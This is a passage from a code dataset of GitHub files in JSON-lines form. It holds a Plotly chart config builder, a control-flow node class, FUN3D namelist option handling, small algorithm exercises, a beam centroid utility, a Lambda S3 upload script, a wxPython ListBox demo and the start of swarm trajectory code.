\"maximumLabelFormat\": \"\",\n \"minimumLabelFormat\": \"\",\n },\n }\n\n chart_size = {\"aspectratio\": \"\", \"displayWidth\": \"\", \"ppi\": \"\"}\n\n child = []\n for col in data.columns:\n if col != \"Series Label\":\n c = {\n \"name\": col,\n \"DisplayText\": \"\",\n \"decimalPlaceValue\": \"\",\n \"offset\": {\"x\": \"\", \"y\": \"\"},\n \"fontFamily\": \"\",\n \"fontSize\": \"\",\n \"fontColor\": \"\",\n \"rotation\": 0,\n \"bold\": \"true\",\n \"brush\": \"\",\n \"fill\": \"\",\n }\n\n child.append(c)\n\n dataLabels = []\n for i in data[\"Series Label\"]:\n dt = {\n \"name\": i,\n \"DisplayText\": \"\",\n \"decimalPlaceValue\": \"\",\n \"offset\": {\"x\": \"\", \"y\": \"\"},\n \"fontFamily\": \"\",\n \"fontSize\": \"\",\n \"fontColor\": \"\",\n \"rotation\": 0,\n \"bold\": \"true\",\n \"brush\": \"\",\n \"fill\": \"\",\n \"child\": child,\n }\n dataLabels.append(dt)\n\n subtitle = {\n \"name\": \"2015 sales\",\n \"DisplayText\": \"2015 Sales\",\n \"fontFamily\": \"Calibri\",\n \"fontSize\": 15,\n \"fontColor\": \"black\",\n \"visible\": False,\n \"bold\": False,\n }\n\n title = {\n \"name\": \"North America Confectionary market companies\",\n \"DisplayText\": \"North America Confectionary market companies\",\n \"fontFamily\": \"Calibri\",\n \"fontSize\": 12,\n \"fontColor\": \"black\",\n \"visible\": True,\n \"pad\": 0,\n \"bold\": False,\n }\n categoryaxisorientation = {\"Label\": \"Horizontal\"}\n acquisition = {\"Labels\": data[\"Series Label\"].values.tolist()}\n showPercentage = {'visible':False}\n rollup = {\n \"label\": \"\",\n \"threshold\": 0,\n \"category threshold\": 0,\n \"companies\": [],\n \"updateCompanies\": []\n }\n list_of_colors = [\n \"skyblue\",\n \"lavender\",\n \"orange\",\n \"mediumvioletred\",\n \"rosybrown\",\n \"lightblue\",\n \"tomato\",\n \"lightsteelblue\",\n \"coral\",\n \"cornflowerblue\",\n \"cornsilk\",\n \"crimson\",\n \"lightcoral\",\n \"cyan\",\n \"darkblue\",\n \"lightgreen\",\n \"darkcyan\",\n \"darkgoldenrod\",\n \"darkgray\",\n \"darkgrey\",\n \"darkgreen\",\n \"darkkhaki\",\n \"darkmagenta\",\n \"darkolivegreen\",\n \"darkorange\",\n \"aliceblue\",\n \"aqua\",\n \"aquamarine\",\n \"azure\",\n \"beige\",\n \"bisque\",\n \"blanchedalmond\",\n \"blue\",\n \"blueviolet\",\n \"darkviolet\",\n \"deeppink\",\n \"deepskyblue\",\n \"dimgray\",\n \"dimgrey\",\n \"dodgerblue\",\n \"firebrick\",\n \"forestgreen\",\n \"fuchsia\",\n \"gainsboro\",\n \"gold\",\n \"goldenrod\",\n \"gray\",\n \"green\",\n \"greenyellow\",\n \"honeydew\",\n \"hotpink\",\n \"indigo\",\n \"ivory\",\n \"khaki\",\n \"lavenderblush\",\n \"lawngreen\",\n \"lemonchiffon\",\n \"darkslateblue\",\n \"darkturquoise\",\n \"lightgoldenrodyellow\",\n \"lightgray\",\n \"lightgrey\",\n \"darkslategray\",\n \"darkslategrey\",\n \"green\",\n \"lightsalmon\",\n \"lightseagreen\",\n \"lightskyblue\",\n \"lightslategray\",\n \"lightslategrey\",\n \"lightpink\",\n \"lightyellow\",\n \"lime\",\n \"limegreen\",\n \"linen\",\n \"magenta\",\n \"maroon\",\n \"mediumaquamarine\",\n \"mediumblue\",\n \"mediumorchid\",\n \"mediumpurple\",\n \"mediumseagreen\",\n \"mediumslateblue\",\n \"mediumspringgreen\",\n \"mediumturquoise\",\n \"lightcyan\",\n \"midnightblue\",\n \"mintcream\",\n \"mistyrose\",\n \"moccasin\",\n \"oldlace\",\n \"olive\",\n \"olivedrab\",\n \"indianred\",\n \"orange\",\n \"orangered\",\n \"orchid\",\n \"palegoldenrod\",\n \"palegreen\",\n \"paleturquoise\",\n \"palevioletred\",\n \"papayawhip\",\n \"peachpuff\",\n \"peru\",\n \"pink\",\n \"plum\",\n \"powderblue\",\n \"purple\",\n 
\"red\",\n \"royalblue\",\n \"rebeccapurple\",\n \"saddlebrown\",\n \"darksalmon\",\n \"salmon\",\n \"sandybrown\",\n \"seagreen\",\n \"seashell\",\n \"sienna\",\n \"silver\",\n \"slateblue\",\n \"slategray\",\n \"slategrey\",\n \"snow\",\n \"brown\",\n \"springgreen\",\n \"steelblue\",\n \"tan\",\n \"teal\",\n \"thistle\",\n \"turquoise\",\n \"violet\",\n \"wheat\",\n \"yellow\",\n \"yellowgreen\",\n \"#594b8b\",\n \"#c73c39\",\n \"#07652f\",\n \"#101dd2\",\n \"#297f70\",\n \"#a24592\",\n \"#7f9339\",\n \"#d9621a\",\n \"#94f82f\",\n \"#599d06\",\n \"#721b3f\",\n \"#fa05b0\",\n \"#da1f7d\",\n \"#9f2137\",\n \"#e298a1\",\n \"#aad1d0\",\n \"#8c2967\",\n \"#fa2d61\",\n \"#851ea6\",\n \"#a4578c\",\n \"#79b8f0\",\n \"#b36d21\",\n \"#90038d\",\n \"#6a2a88\",\n \"#1e8e0e\",\n \"#6672c0\",\n \"#485869\",\n \"#30da83\",\n \"#f1b780\",\n \"#808313\",\n \"#6e8d48\",\n \"#13205a\",\n \"#5e6a9b\",\n \"#bccf2b\",\n \"#a5ecfd\",\n \"#279a2f\",\n \"#8fc4c5\",\n \"#09071f\",\n \"#2f8404\",\n \"#67d6ef\",\n \"#6bf237\",\n \"#9c9019\",\n \"#b4f73a\",\n \"#b8bc9c\",\n \"#0414f5\",\n \"#ff667b\",\n \"#5ef62b\",\n \"#55c169\",\n \"#dccd03\",\n \"#2fb896\",\n \"#561ec8\",\n \"#ad1f6f\",\n \"#b0b8c8\",\n \"#45cba1\",\n \"#23833f\",\n \"#ed300a\",\n \"#8dd65b\",\n \"#6db953\",\n \"#4c1006\",\n \"#bf6ddc\",\n \"#5dc27d\",\n \"#8fe992\",\n \"#3f5571\",\n \"#02ad96\",\n \"#0f8f10\",\n \"#4b6013\",\n \"#5cb1ea\",\n \"#a14f1b\",\n \"#7428aa\",\n \"#5de38d\",\n \"#124a14\",\n \"#c2242b\",\n \"#9b50e9\",\n \"#4bd258\",\n \"#9f73e7\",\n \"#41bf68\",\n \"#0d207e\",\n \"#0a9fd5\",\n \"#6f2a41\",\n \"#f1707b\",\n \"#d818ec\",\n \"#2df3ea\",\n \"#209925\",\n \"#0c88e6\",\n \"#02e505\",\n \"#3757d0\",\n \"#fe5346\",\n \"#ba6bc2\",\n \"#283fd0\",\n \"#5f0154\",\n \"#c1b433\",\n \"#e7ae91\",\n \"#fcdf1d\",\n \"#7c6a78\",\n \"#b99efc\",\n \"#13453e\",\n \"#80d79f\",\n \"#e7041d\",\n \"#d6cdc6\",\n \"#2901b3\",\n ]\n\n color_code = {}\n color_count = 0\n for each_comp in data[\"Series Label\"].unique():\n color_code[each_comp] = list_of_colors[color_count]\n color_count += 1\n\n mekko_total = 0\n for value in summary_axis[\"summayAxisLabel\"]:\n b = value[\"name\"].replace(\"$\", \"\")\n b = b.replace(\"b\", \"\")\n mekko_total += int(b)\n response = {\n \"chart\": \"mekko\",\n \"type\": \"plotly\",\n \"input_data\": result,\n \"Data\": {\n \"Labels\": [\n \"Axis\",\n \"chartSize\",\n \"DataLabels\",\n \"MekkoTotal\",\n \"subTitle\",\n \"title\",\n \"rollUp\",\n \"Acquisition\",\n \"CategoryAxisOrientation\",\n \"showPercentage\"\n ],\n \"Axis\": [\"CategoryAxis\", \"SummaryAxis\", \"ValueAxis\"],\n \"MekkoTotal\": {\"Total\": \"Total = ${0}b\".format(mekko_total),\n \"fontColor\": \"black\",\n \"color\": \"\",\n \"fontFamily\": \"\",\n \"fontSize\":12,\n \"bold\": False},\n \"CategoryAxis\": category_axis,\n \"CategoryAxisOrientation\" : categoryaxisorientation,\n \"SummaryAxis\": summary_axis,\n \"ValueAxis\": value_axis,\n \"chartSize\": chart_size,\n \"DataLabels\": {\"dataLabels\": dataLabels},\n \"subTitle\": subtitle,\n \"title\": title,\n \"rollUp\": rollup,\n \"Acquisition\": acquisition,\n \"showPercentage\": showPercentage\n },\n \"Project\": \"\",\n \"Name\": \"\",\n \"Year\": \"\",\n \"Market\": \"\",\n \"Region\": \"\",\n \"Currency\": \"\",\n \"barcolor\": color_code,\n }\n\n # r = json.dumps(response)\n return 
response","repo_name":"arjunlimat/catalystpoc","sub_path":"chartgeneration/input_request.py","file_name":"input_request.py","file_ext":"py","file_size_in_byte":13169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4954585387","text":"from datetime import timedelta, datetime\nfrom typing import List, Optional, TYPE_CHECKING, Type, Any, TypeVar, Sequence\n\nfrom pycontrolflow.IFlowValueProvider import IFlowValueProvider\nfrom pycontrolflow.flow_value import FlowMemoryCell\nfrom pycontrolflow.string_utils import random_string\nfrom pycontrolflow.types import TNodeInput\n\nif TYPE_CHECKING:\n from pycontrolflow.Flow import Flow\n from pycontrolflow.FlowExecutor import FlowExecutor\n from pycontrolflow.nodes.FlowSingleOutputNode import FlowSingleOutputNode\n\nT = TypeVar(\"T\")\n\n\nclass FlowNode:\n def __init__(self, providers: Sequence[IFlowValueProvider[Any]], nid: Optional[str] = None) -> None:\n self.nid = nid\n self.providers: Sequence[IFlowValueProvider[Any]] = providers\n self.flow_executor: 'FlowExecutor' = None # type: ignore\n\n self.subflows: List['Flow'] = []\n\n def set_executor(self, flow_executor: 'FlowExecutor') -> None:\n self.flow_executor = flow_executor\n for provider in self.providers:\n if isinstance(provider, FlowNode):\n provider.set_executor(flow_executor)\n\n def register_subflow(self, flow: Optional['Flow']) -> None:\n if flow is not None:\n self.subflows.append(flow)\n\n # called after flow executor injected dependencies\n def setup(self) -> None:\n for provider in self.providers:\n self._register_provider(provider)\n\n def reset_state(self) -> None:\n for provider in self.providers:\n if isinstance(provider, FlowNode):\n provider.reset_state()\n\n def process(self, cur_date: datetime, delta: timedelta) -> None:\n for provider in self.providers:\n if isinstance(provider, FlowNode):\n provider.process(cur_date, delta)\n\n def _create_memory(self, name: str, var_type: Type[T], initial_value: T, persistent: bool = False) -> \\\n FlowMemoryCell[T]:\n # noinspection PyProtectedMember\n return self.flow_executor._memory_for_node(self.nid, name, var_type, initial_value, persistent)\n\n def _register_provider(self, provider: TNodeInput[Any]) -> None:\n from pycontrolflow.nodes.FlowSingleOutputNode import FlowSingleOutputNode\n\n if isinstance(provider, FlowSingleOutputNode):\n provider.setup()\n provider.to(self.flow_executor.var(f\"_tmp.{random_string(10)}\", provider.get_type()))\n","repo_name":"KrystianD/pycontrolflow","sub_path":"pycontrolflow/nodes/FlowNode.py","file_name":"FlowNode.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30948744187","text":"\"\"\"\nThis module provides a class to interpret JSON options that are converted to\nFortran namelist format for FUN3D. The\nmodule provides a class, :class:`pyFun.options.fun3dnml.Fun3DNml`, which\ninterprets the settings of the ``\"Fun3D\"`` section of the master JSON file.\nThese settings are then applied to the main OVERFLOW input file, the\n``fun3d.nml`` namelist.\n\nAn example JSON setting is shown below.\n\n .. 
code-block:: javascript\n \n \"Fun3D\": {\n \"nonlinear_solver_parameters\": {\n \"schedule_cfl\": [[1.0, 5.0], [5.0, 20.0], [20.0, 20.0]],\n \"time_accuracy\": [\"steady\", \"steady\", \"2ndorder\"],\n \"time_step_nondim\": 2.0,\n \"subiterations\": 5\n },\n \"boundary_output_variables\": {\n \"boundary_list\": \"7-52\",\n \"turres1\": true,\n \"p_tavg\": [false, false, true]\n }\n }\n \nThis will cause the following settings to be applied to ``fun3d.00.nml``.\n\n .. code-block:: none\n \n &nonlinear_solver_parameters\n schedule_cfl = 1.0 5.0\n time_accuracy = 'steady'\n time_step_nondim = 2.0\n subiterations = 5\n /\n &boundary_output_variables\n boundary_list = '7-52'\n turres1 = .true.\n p_tavg = .false.\n /\n \nThe edits to ``fun3d.02.nml`` are from the third entries of each list:\n\n .. code-block:: none\n \n &nonlinear_solver_parameters\n schedule_cfl = 20.0 20.0\n time_accuracy = '2ndorder'\n time_step_nondim = 2.0\n subiterations = 5\n /\n &boundary_output_variables\n boundary_list = '7-52'\n turres1 = .true.\n p_tavg = .true.\n /\n \nEach setting and section in the ``\"Fun3D\"`` section may be either present in\nthe template namelist or missing. It will be either edited or added as\nappropriate, even if the specified section does not exist.\n\n:See also:\n * :mod:`cape.pyfun.namelist`\n * :mod:`cape.pyfun.cntl`\n * :mod:`cape.filecntl.namelist`\n\"\"\"\n\n# Ipmort options-specific utilities\nfrom .util import rc0, odict, getel, setel\n\n# Class for namelist settings\nclass Fun3DNml(odict):\n \"\"\"Dictionary-based interface for FUN3D namelists\"\"\"\n \n # Get the project namelist\n def get_project(self, i=None):\n \"\"\"Return the ``project`` namelist\n \n :Call:\n >>> d = opts.get_project(i=None)\n :Inputs:\n *opts*: :class:`pyFun.options.Options`\n Options interface\n *i*: :class:`int` or ``None``\n Run sequence index\n :Outputs:\n *d*: :class:`pyFun.options.odict`\n Project namelist\n :Versions:\n * 2015-10-18 ``@ddalle``: First version\n \"\"\"\n # Get the value\n d = getel(self.get('project'), i) \n # Check for None\n if d is None:\n # Return empty dict\n return odict()\n else:\n # Convert dictionary to odict\n return odict(**d)\n \n # Get the project namelist\n def get_raw_grid(self, i=None):\n \"\"\"Return the ``raw_grid`` namelist\n \n :Call:\n >>> d = opts.get_raw_grid(i=None)\n :Inputs:\n *opts*: :class:`pyFun.options.Options`\n Options interface\n *i*: :class:`int` or ``None``\n Run sequence index\n :Outputs:\n *d*: :class:`pyFun.options.odict`\n Grid namelist\n :Versions:\n * 2015-10-18 ``@ddalle``: First version\n \"\"\"\n # Get the value\n d = getel(self.get('raw_grid'), i) \n # Check for None\n if d is None:\n # Return empty dict\n return odict()\n else:\n # Convert dictionary to odict\n return odict(**d)\n \n # Get rootname\n def get_project_rootname(self, i=None):\n \"\"\"Return the project root name\n \n :Call:\n >>> rname = opts.get_project_rootname(i=None)\n :Inputs:\n *opts*: :class:`pyFun.options.Options`\n Options interface\n *i*: :class:`int` or ``None``\n Run sequence index\n :Outputs:\n *rname*: :class:`str`\n Project root name\n :Versions:\n * 2015-10-18 ``@ddalle``: First version\n \"\"\"\n # Get the namelist\n d = self.get_project(i)\n # Get the value.\n return d.get_key('project_rootname', i)\n \n # Grid format\n def get_grid_format(self, i=None):\n \"\"\"Return the grid format\n \n :Call:\n >>> fmat = opts.get_grid_format(i=None)\n :Inputs:\n *opts*: :class:`pyFun.options.Options`\n Options interface\n *i*: :class:`int` or ``None``\n Run sequence 
index\n :Outputs:\n *fmat*: :class:`str`\n Grid format\n :Versions:\n * 2015-10-18 ``@ddalle``: First version\n \"\"\"\n # Get the raw_grid namelist\n d = self.get_raw_grid(i)\n # Get the value.\n return d.get_key('grid_format', i)\n \n \n # Reduce to a single run sequence\n def select_namelist(self, i=0):\n \"\"\"Reduce namelist options to a single instance (i.e. sample lists)\n \n :Call:\n >>> d = opts.select_namelist(i)\n :Inputs:\n *opts*: :class:`pyFun.options.Options`\n Options interface\n *i*: :class:`int` or ``None``\n Run sequence index\n :Outputs:\n *d*: :class:`pyFun.options.odict`\n Project namelist\n :Versions:\n * 2015-10-18 ``@ddalle``: First version\n \"\"\"\n # Initialize output\n d = {}\n # Loop through keys\n for sec in self:\n # Get the list\n L = getel(self[sec], i)\n # Initialize this list.\n d[sec] = {}\n # Loop through subkeys\n for k in L:\n # Select the key and assign it.\n d[sec][k] = getel(L[k], i)\n # Output\n return d\n \n # Get value by name\n def get_namelist_var(self, sec, key, i=None):\n \"\"\"Select a namelist key from a specified section\n \n Roughly, this returns ``opts[sec][key]``.\n \n :Call:\n >>> val = opts.get_namelist_var(sec, key, i=None)\n :Inputs:\n *opts*: :class:`pyFun.options.Options`\n Options interface\n *sec*: :class:`str`\n Section name\n *key*: :class:`str`\n Variable name\n *i*: :class:`int` | ``None``\n Run sequence index\n :Outputs:\n *val*: :class:`int` | :class:`float` | :class:`str` | :class:`list`\n Value from JSON options\n :Versions:\n * 2015-10-19 ``@ddalle``: First version\n \"\"\"\n # Check for namelist\n if sec not in self: return None\n # Select the namelist\n d = getel(self[sec], i)\n # Select the value.\n return getel(d.get(key), i)\n \n # Set value by name\n def set_namelist_var(self, sec, key, val, i=None):\n \"\"\"Set a namelist key for a specified phase or phases\n \n Roughly, this sets ``opts[\"Fun3D\"][sec][key]`` or\n ``opts[\"Fun3D\"][sec][key][i]`` equal to *val*\n \n :Call:\n >>> opts.set_namelist_var(sec, key, val, i=None)\n :Inputs:\n *opts*: :class:`pyFun.options.Options`\n Options interface\n *sec*: :class:`str`\n Section name\n *key*: :class:`str`\n Variable name\n *val*: :class:`int` | :class:`float` | :class:`str` | :class:`list`\n Value from JSON options\n *i*: :class:`int` | ``None``\n Run sequence index\n :Versions:\n * 2017-04-05 ``@ddalle``: First version\n \"\"\"\n # Initialize section\n if sec not in self: self[sec] = {}\n # Initialize key\n if key not in self[sec]: self[sec][key] = None\n # Set value\n self[sec][key] = setel(self[sec][key], i, val)\n \n","repo_name":"nasa/cape","sub_path":"cape/pyfun/options/fun3dnml.py","file_name":"fun3dnml.py","file_ext":"py","file_size_in_byte":8354,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"73394450667","text":"from typing import Optional\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n @staticmethod\n def sum_of_left_leaves(root: Optional[TreeNode]) -> int:\n def inner(root: Optional[TreeNode], is_left: bool) -> int:\n if root is None:\n return 0\n\n _sum = 0\n if root.left is None and root.right is None and is_left:\n _sum = root.val\n\n return (\n _sum + inner(root.left, is_left=True) + inner(root.right, is_left=False)\n )\n\n return inner(root=root, is_left=False)\n\n\nif __name__ == \"__main__\":\n 
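    # A fuller smoke test than the bare call below: in the tree
    # [3, 9, 20, None, None, 15, 7] the left leaves are 9 and 15, so the
    # expected sum is 24.
    #
    #     root = TreeNode(3, TreeNode(9), TreeNode(20, TreeNode(15), TreeNode(7)))
    #     assert Solution.sum_of_left_leaves(root) == 24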
print(Solution().sum_of_left_leaves(root=TreeNode()))\n","repo_name":"ajesh-mishra/python_leetcode","sub_path":"lc_404_sum_of_left_leaves.py","file_name":"lc_404_sum_of_left_leaves.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6189607586","text":"# Queues: A Tale of Two Stacks\n# Cracking the Coding Interview Challenge\n# https://www.hackerrank.com/challenges/ctci-queue-using-two-stacks\n\nclass MyQueue(object):\n def __init__(self):\n self.head = Node(None,None,None)\n self.tail = Node(None,None,None)\n self.head.next = self.tail\n self.tail.previous = self.head\n \n def peek(self):\n return self.head.next.value\n \n def pop(self):\n self.head.next = self.head.next.next\n self.head.next.previous = self.head\n \n def put(self, value):\n newNode = Node(value, self.tail, self.tail.previous)\n newNode.previous.next = newNode\n self.tail.previous = newNode\n \nclass Node(object):\n def __init__(self, value, nextNode, previousNode):\n self.value = value\n self.next = nextNode\n self.previous = previousNode\n \n\n#----------------------- Provided -----------------------\nqueue = MyQueue()\nt = int(input())\nfor line in range(t):\n values = map(int, input().split())\n values = list(values)\n if values[0] == 1:\n queue.put(values[1]) \n elif values[0] == 2:\n queue.pop()\n else:\n print(queue.peek())\n \n","repo_name":"bradymadden97/practice","sub_path":"ctci-queue-using-two-stacks.py","file_name":"ctci-queue-using-two-stacks.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13526157413","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport seaborn as sns\nimport matplotlib as mpl\nfrom multiprocessing import pool, cpu_count\nfrom felpy.analysis.statistics.correlation import norm as normalise\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom os import listdir\nfrom scipy.ndimage import center_of_mass\n\nimport pandas as pd\n\n\ndef get_com(arr):\n \n \"\"\" \n return the center of mass of a 2D array. If the input array is three-dimensional,\n return the slice wise list of center. 
If four-dimensional, likewise, iterate\n over the third and fourth dimensions.\n \n assumes dimensions [nx, ny, nz, nt] or likewise\n \n :param arr: input array, ie., beam intensity [np array]\n \n :returns centroid: numpy array containing index of beam centroids.\n \"\"\"\n \n if arr.ndim == 2:\n \n ### centroid is a tuple\n centroid = center_of_mass(arr)\n \n elif arr.ndim == 3:\n \n ### centroid shape [nz, 2]\n centroid = [center_of_mass(arr[:,:,i]) for i in range(arr.shape[-1])]\n \n elif arr.ndim == 4:\n \n centroid = np.zeros([arr.shape[-2], 2, arr.shape[-1]])\n \n for itr in range(arr.shape[-1]):\n \n c = [center_of_mass(arr[:,:,i,itr]) for i in range(arr.shape[-2])]\n centroid[:,:,itr] = np.asarray(c)\n centroid = np.asarray(centroid)\n\n return centroid\n\ndef com_to_h5(image, outdir, px = 1, py = 1):\n \"\"\" \n wrapper function to write center-of-mass outputs to a h5 file\n \n :param image: image to be analysed\n :param outdir: directory of h5 file\n :param px: horizontal pixel size (m)\n :paray py: vertical pixel size (m)\n \"\"\"\n \n dict_com_x = {}\n dict_com_y = {}\n\n com = get_com(image)\n\n\n for itr in range(image.shape[-1]):\n\n dict_com_x['Train {}'.format(itr)] = com[:,0,itr]*px\n dict_com_y['Train {}'.format(itr)] = com[:,1,itr]*py\n\n\n df_x = pd.DataFrame.from_dict(dict_com_x)\n df_y = pd.DataFrame.from_dict(dict_com_y)\n\n df_x.to_hdf(outdir, key = \"com_x\")\n df_y.to_hdf(outdir, key = \"com_y\")\n\n\nif __name__ == '__main__':\n \n arr = np.random.rand(100,100, 128, 5)*50\n \n cnt = get_com(arr)\n \n #arg = np.random.rand(arr.shape[-1], arr.shape[-2])\n #plot_centroid(cnt, arg,clabel = \"Energy\")","repo_name":"twguest/FELpy","sub_path":"felpy/analysis/centroid.py","file_name":"centroid.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"43552018112","text":"import requests\nimport boto3\nimport os\n\nbucket_name = os.environ.get('BUCKET_NAME')\ncontent = requests.get('https://data.gharchive.org/2015-01-01-15.json.gz').content\ns3_client = boto3.client('s3')\ns3_client.put_object(\n Body=content,\n Bucket=bucket_name,\n Key='lambdademo/2015-01-01-15.json.gz'\n)\n","repo_name":"kasungayand/awslambdademo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1054744501","text":"#Boa:Frame:Frame1\r\n\r\nimport wx\r\n\r\ndef create(parent):\r\n return Frame1(parent)\r\n\r\n[wxID_FRAME1, wxID_FRAME1BUTTON1, wxID_FRAME1BUTTON2, wxID_FRAME1LIST_KOTA, \r\n wxID_FRAME1PANEL1, wxID_FRAME1STATICTEXT1, wxID_FRAME1STATICTEXT2, \r\n wxID_FRAME1TXT_KOTA, \r\n] = [wx.NewId() for _init_ctrls in range(8)]\r\n\r\nclass Frame1(wx.Frame):\r\n def _init_ctrls(self, prnt):\r\n # generated method, don't edit\r\n wx.Frame.__init__(self, id=wxID_FRAME1, name='', parent=prnt,\r\n pos=wx.Point(461, 269), size=wx.Size(400, 325),\r\n style=wx.DEFAULT_FRAME_STYLE, title='Demo ListBox')\r\n self.SetClientSize(wx.Size(384, 287))\r\n\r\n self.panel1 = wx.Panel(id=wxID_FRAME1PANEL1, name='panel1', parent=self,\r\n pos=wx.Point(0, 0), size=wx.Size(384, 287),\r\n style=wx.TAB_TRAVERSAL)\r\n self.panel1.SetBackgroundColour(wx.Colour(206, 206, 206))\r\n\r\n self.staticText1 = wx.StaticText(id=wxID_FRAME1STATICTEXT1,\r\n label='Daftar Nama Kota', name='staticText1', parent=self.panel1,\r\n pos=wx.Point(24, 32), size=wx.Size(87, 13), style=0)\r\n\r\n 
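        # The ListBox below is seeded through the choices keyword; entries can
        # also be appended after construction, e.g. (hypothetical city name):
        #     self.list_kota.Append('Yogyakarta')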
self.list_kota = wx.ListBox(choices=['Bandung', 'Medan', 'Solo',\r\n 'Surabaya', 'Jakarta'], id=wxID_FRAME1LIST_KOTA, name='list_kota',\r\n parent=self.panel1, pos=wx.Point(16, 56), size=wx.Size(128, 168),\r\n style=0)\r\n self.list_kota.Bind(wx.EVT_LISTBOX, self.OnList_kotaListbox,\r\n id=wxID_FRAME1LIST_KOTA)\r\n\r\n self.button1 = wx.Button(id=wxID_FRAME1BUTTON1,\r\n label='Bersihkan ListBox', name='button1', parent=self.panel1,\r\n pos=wx.Point(24, 248), size=wx.Size(120, 23), style=0)\r\n self.button1.Bind(wx.EVT_BUTTON, self.OnButton1Button,\r\n id=wxID_FRAME1BUTTON1)\r\n\r\n self.staticText2 = wx.StaticText(id=wxID_FRAME1STATICTEXT2,\r\n label='Kota yang Dipilih', name='staticText2', parent=self.panel1,\r\n pos=wx.Point(184, 88), size=wx.Size(80, 13), style=0)\r\n\r\n self.txt_kota = wx.TextCtrl(id=wxID_FRAME1TXT_KOTA, name='txt_kota',\r\n parent=self.panel1, pos=wx.Point(184, 112), size=wx.Size(128, 21),\r\n style=0, value='')\r\n\r\n self.button2 = wx.Button(id=wxID_FRAME1BUTTON2, label='Isi ListBox',\r\n name='button2', parent=self.panel1, pos=wx.Point(192, 248),\r\n size=wx.Size(128, 23), style=0)\r\n self.button2.Bind(wx.EVT_BUTTON, self.OnButton2Button,\r\n id=wxID_FRAME1BUTTON2)\r\n\r\n def __init__(self, parent):\r\n self._init_ctrls(parent)\r\n\r\n def OnList_kotaListbox(self, event):\r\n self.txt_kota.SetValue\\\r\n (self.list_kota.GetStringSelection())\r\n\r\n def OnButton1Button(self, event):\r\n self.list_kota.Clear()\r\n\r\n def OnButton2Button(self, event):\r\n self.list_kota.Clear()\r\n self.list_kota.Append('Bandung')\r\n self.list_kota.Append('Medan')\r\n self.list_kota.Append('Solo')\r\n self.list_kota.Append('Surabaya')\r\n self.list_kota.Append('Jakarta')\r\n \r\n","repo_name":"ajitirto/belajar-bahasa","sub_path":"Bab VI/Demo ListBox/Frame1.py","file_name":"Frame1.py","file_ext":"py","file_size_in_byte":3079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38591771091","text":"#/usr/bin/env python3\n\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\n\n\n\ndef swarm_relative_test(platforms, idx, running_time): \n # properties\n hold_position = [-0.22,-0.2]\n period = 40\n \n r = 1.5\n \n if idx == 0: # perform absolute motion\n x,y = hold_position\n print(('running time', running_time))\n a = (running_time % period)/period * 2*np.pi\n return x,y,a\n else:\n primairy_platform = platforms[0]\n xt,yt,at = primairy_platform.xpos, primairy_platform.ypos, primairy_platform.attitude\n\n cycle_progress = (running_time%period)/period\n\n # x = -r*np.cos(cycle_progress * 2* np.pi) + xt\n # y = r*np.sin(cycle_progress * 2* np.pi) + yt\n\n x = -r*np.cos(at) + xt\n y = r*np.sin(at) + yt\n\n a = at\n return x, y, a\n # primairy_platform = platforms[0]\n # xt,yt,at = primairy_platform.xpos, primairy_platform.ypos, primairy_platform.attitude\n #\n # x = r*np.cos(at) + xt\n # y = r*np.sin(at) + yt\n # a = (-at)%(2*np.pi)\n # return x,y,a\n\n\ndef swarm_full_test(platforms, idx, running_time):\n # properties\n center_pos = [-0.22,-0.2]\n period = 50\n f1 = 2\n f2 = 3\n\n r1 = 0.5\n r2 = 1.1\n\n if idx == 0: # perform absolute motion\n cycle_progress = ((running_time/period)%1)\n x,y = r1*np.cos(2*np.pi*cycle_progress * f1) + center_pos[0], r1*np.sin(2*np.pi*cycle_progress * f1) + center_pos[1]\n a = 0# -(((running_time*spin_factor)/period)%1) * 2*np.pi\n\n return x,y,a\n\n else:\n primairy_platform = platforms[0]\n xt,yt,at = primairy_platform.xpos, primairy_platform.ypos, primairy_platform.attitude\n\n 
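        # The follower below rides a circle of radius r2 around the leader's
        # pose (xt, yt). A standalone sketch of the same parametrisation, with
        # the leader fixed at the origin for illustration:
        #
        #     import numpy as np
        #     t = 0.25                              # cycle progress in [0, 1)
        #     x = -1.1 * np.cos(2 * np.pi * t * 3)  # r2 = 1.1, f2 = 3
        #     y = 1.1 * np.sin(2 * np.pi * t * 3)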
# x = r2*np.cos(at) + xt\n # y = r2*np.sin(at) + yt\n\n cycle_progress = (running_time % period) / period\n\n x = -r2*np.cos(cycle_progress * 2* np.pi * f2) + xt\n y = r2*np.sin(cycle_progress * 2* np.pi * f2) + yt\n a = 0 #(-at)%(2*np.pi)\n\n return x,y,a\n\n\ndef transform_frame(data, transform=[0,0,0]):\n t_data, x_data, y_data, a_data = data\n dx, dy, da = transform\n \n x_transformed = x_data + dx\n y_transformed = y_data + dy\n a_transform = a_data + da # check if behaving\n \n return t_data, x_transformed, y_transformed, a_transform\n \n \ndef stay_at_position(dt = 0.1):\n time_set = np.arange(0, 10, dt)\n \n x_pos = np.zeros(len(time_set))\n y_pos = np.zeros(len(time_set))\n a_set = np.zeros(len(time_set))\n \n return [time_set, x_pos, y_pos, a_set], [time_set, x_pos, y_pos, a_set]\n \n \n\n\n\ndef circle_around_point(point_pos, point_vel, time, radius, period, sign=1, initial_time=0, initial_angle=0):\n center_px, center_py = point_pos\n center_vx, center_vy = point_vel\n \n rate = 